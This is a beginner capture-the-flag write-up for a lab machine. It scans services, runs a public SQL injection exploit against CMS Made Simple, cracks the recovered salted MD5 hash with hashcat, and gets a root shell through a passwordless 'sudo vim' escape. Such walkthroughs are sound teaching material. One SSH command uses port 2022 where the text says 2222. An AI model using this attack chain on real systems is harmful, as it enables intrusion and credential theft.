Introduction
Welcome to the "Simple CTF" write-up, a good challenge for beginners! In this CTF, we'll explore different services such as FTP, SSH and Apache to find security holes and gain access privileges.
Nmap scan
We start by running a Nmap scan to identify the services running on the target machine:
nmap -sS -A -oN nmap.scan 10.10.61.157
Starting Nmap 7.60 ( https://nmap.org ) at 2023-01-15 23:04 GMT
Nmap scan report for ip-10-10-61-157.eu-west-1.compute.internal (10.10.61.157)
Host is up (0.00046s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: TIMEOUT
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:10.10.5.191
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 2
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 2 disallowed entries
|_/ /openemr-5_0_1_3
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
2222/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 29:42:69:14:9e:ca:d9:17:98:8c:27:72:3a:cd:a9:23 (RSA)
| 256 9b:d1:65:07:51:08:00:61:98:de:95:ed:3a:e3:81:1c (ECDSA)
|_ 256 12:65:1b:61:cf:4d:e5:75:fe:f4:e8:d4:6e:10:2a:f6 (EdDSA)
MAC Address: 02:38:C1:F6:E0:CD (Unknown)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.13 (93%), Linux 3.8 (93%), Crestron XPanel control system (89%), HP P2000 G3 NAS device (86%), ASUS RT-N56U WAP (Linux 3.4) (86%), Linux 3.1 (86%), Linux 3.16 (86%), Linux 3.2 (86%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (86%), Linux 2.6.32 (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.46 ms ip-10-10-61-157.eu-west-1.compute.internal (10.10.61.157)
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 64.30 seconds
The scan results show that the following ports are open:
Port 21 (FTP): vsftpd 3.0.3 with authorized anonymous access
Port 80 (HTTP): Apache httpd 2.4.18
Port 2222 (SSH): OpenSSH 7.2p2
Exploring the FTP service
As anonymous FTP access is authorized, we connect to it and explore its contents:
ftp anonymous@10.10.17.128
ftp> ls
drwxr-xr-x 2 ftp ftp 4096 Aug 17 2019 pub
226 Directory send OK.
ftp> cd pub
250 Directory successfully changed.
ftp> ls
-rw-r--r-- 1 ftp ftp 166 Aug 17 2019 ForMitch.txt
226 Directory send OK.
ftp> get ForMitch.txt
local: ForMitch.txt remote: ForMitch.txt
200 EPRT command successful. Consider using EPSV.
150 Opening BINARY mode data connection for ForMitch.txt (166 bytes).
100% |**********************************************************************************| 166 681.13 KiB/s 00:00 ETA
226 Transfer complete.
166 bytes received in 00:00 (6.80 KiB/s)
ftp> exit
221 Goodbye.
In the pub directory, we find a file named ForMitch.txt, which contains a password hint:
cat ForMitch.txt
Dammit man... you'te the worst dev i've seen. You set the same pass for the system user, and the password is so weak... i cracked it in seconds. Gosh... what a mess!
Exploring the HTTP service
Visiting the website hosted on port 80, we find a default Apache page.
To extend our content search, we use the gobuster tool.
gobuster dir -u http://10.10.17.128 -w directory-list-2.3-medium.txt
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.17.128
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /Users/bobo/Documents/wordlists/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.5
[+] Timeout: 10s
===============================================================
2023/08/02 21:32:53 Starting gobuster in directory enumeration mode
===============================================================
/simple (Status: 301) [Size: 313] [--> http://10.10.17.128/simple/]
/server-status (Status: 403) [Size: 300]
Progress: 220534 / 220561 (99.99%)
===============================================================
2023/08/02 21:42:02 Finished
===============================================================
The scan reveals a /simple folder containing a CMS called "Made Simple 2.2.8". This CMS allows you to create and manage websites, like WordPress.
This CMS is known to be vulnerable to an SQL injection (CVE 2019-9053) in versions lower than 2.2.10.
Exploiting SQL injection
We use a Python script (this one) to exploit the SQL injection vulnerability.
It extracts sensitive information such as usernames and password hashes, and, if specified, attempts to crack user passwords to gain privileged access.
The -u option is used to specify the target URL of the vulnerable web server.
The -w option is used to provide a dictionary of words to perform a brute-force attack on the recovered password hashes.
python exploit.py -u http://10.10.17.128 -w Documents/Pentest/rockyou.txt
[+] Salt for password found: 1dac0d92e9fa6bb2
[+] Username found: mitch
[+] Email found: admin@admin.com
[+] Password found: 0c01f4468bd75d7a84c7eb73846e8d96
The script successfully extracts the username mitch and the password hash.
Cracking the hash
To crack the hash and obtain the password, we first need to identify the type of hash. You can use online sites like hashes.com or a tool like hash-identifier. I'm going to use hash-identifier (requires Python).
After downloading it, it's very easy to use:
python hash-id.py hash_to_verify
python hash-id.py 0c01f4468bd75d7a84c7eb73846e8d96
#########################################################################
# __ __ __ ______ _____ #
# /\\ \\/\\ \\ /\\ \\ /\\__ _\\ /\\ _ `\\ #
# \\ \\ \\_\\ \\ __ ____ \\ \\ \\___ \\/_/\\ \\/ \\ \\ \\/\\ \\ #
# \\ \\ _ \\ /'__`\\ / ,__\\ \\ \\ _ `\\ \\ \\ \\ \\ \\ \\ \\ \\ #
# \\ \\ \\ \\ \\/\\ \\_\\ \\_/\\__, `\\ \\ \\ \\ \\ \\ \\_\\ \\__ \\ \\ \\_\\ \\ #
# \\ \\_\\ \\_\\ \\___ \\_\\/\\____/ \\ \\_\\ \\_\\ /\\_____\\ \\ \\____/ #
# \\/_/\\/_/\\/__/\\/_/\\/___/ \\/_/\\/_/ \\/_____/ \\/___/ v1.2 #
# By Zion3R #
# www.Blackploit.com #
# Root@Blackploit.com #
#########################################################################
--------------------------------------------------
Possible Hashs:
[+] MD5
[+] Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))
Least Possible Hashs:
[+] RAdmin v2.x
[+] NTLM
[+] MD4
...
This is an MD5 hash.
I used hashcat to crack the hash with its salt.
The salt is a random element added to a password before hashing. It enhances security by avoiding dictionary attacks and generating unique hashes for the same password.
Put the hash and salt in a file (here, md5.txt) in this format: hash:salt
0c01f4468bd75d7a84c7eb73846e8d96:1dac0d92e9fa6bb2
hashcat -m 20 -o result.txt -a 0 md5.txt /usr/share/wordlists/rockyou.txt
...
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 20 (md5($salt.$pass))
Hash.Target......: 0c01f4468bd75d7a84c7eb73846e8d96:1dac0d92e9fa6bb2
Time.Started.....: Wed Aug 2 23:24:26 2023 (0 secs)
Time.Estimated...: Wed Aug 2 23:24:26 2023 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 254.9 kH/s (0.06ms) @ Accel:256 Loops:1 Thr:1 Vec:4
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 512/14344385 (0.00%)
Rejected.........: 0/512 (0.00%)
Restore.Point....: 0/14344385 (0.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: 123456 -> letmein
Command explanation
-m 20: Specifies the hash mode, here mode 20 corresponds to MD5 with a salt (md5($salt.$pass)).
-o result.txt: Specifies the output file for saving cracked passwords.
-a 0: Indicates the type of attack, here 0 corresponds to a dictionary attack.
md5.txt: The file containing the hashes to be cracked, in hash:salt format.
/usr/share/wordlists/rockyou.txt: The dictionary used for the dictionary attack, in this case the file rockyou.txt containing a current list of passwords.
It has been cracked, here's the password
cat result.txt
0c01f4468bd75d7a84c7eb73846e8d96:1dac0d92e9fa6bb2:secret
Obtaining the user.txt flag
Thanks to the hint left in FTP, we knew we could connect to SSH with the same password.
⚠️ Be sure to add port 2222
ssh mitch@10.10.18.179 -p 2022
After logging in, we find the user.txt flag in user mitch's directory.
$ pwd
/home/mitch
$ ls -la
total 36
drwxr-x--- 3 mitch mitch 4096 aug 19 2019 .
drwxr-xr-x 4 root root 4096 aug 17 2019 ..
-rw------- 1 mitch mitch 178 aug 17 2019 .bash_history
-rw-r--r-- 1 mitch mitch 220 sep 1 2015 .bash_logout
-rw-r--r-- 1 mitch mitch 3771 sep 1 2015 .bashrc
drwx------ 2 mitch mitch 4096 aug 19 2019 .cache
-rw-r--r-- 1 mitch mitch 655 mai 16 2017 .profile
-rw-rw-r-- 1 mitch mitch 19 aug 17 2019 user.txt
-rw------- 1 mitch mitch 515 aug 17 2019 .viminfo
Elevating privileges
By running sudo -l, we see that we can run vim as root without a password:
sudo -l
User mitch may run the following commands on Machine:
(root) NOPASSWD: /usr/bin/vim
Thanks to GTFObins, we can exploit this vulnerability to obtain a root shell using the following command:
sudo vim -c ':!/bin/sh'
⚠️ Type :q then press Enter to quit vim
We check that we have root privileges by running id
# id
uid=0(root) gid=0(root) groups=0(root)
And we find the root.txt flag in the root directory.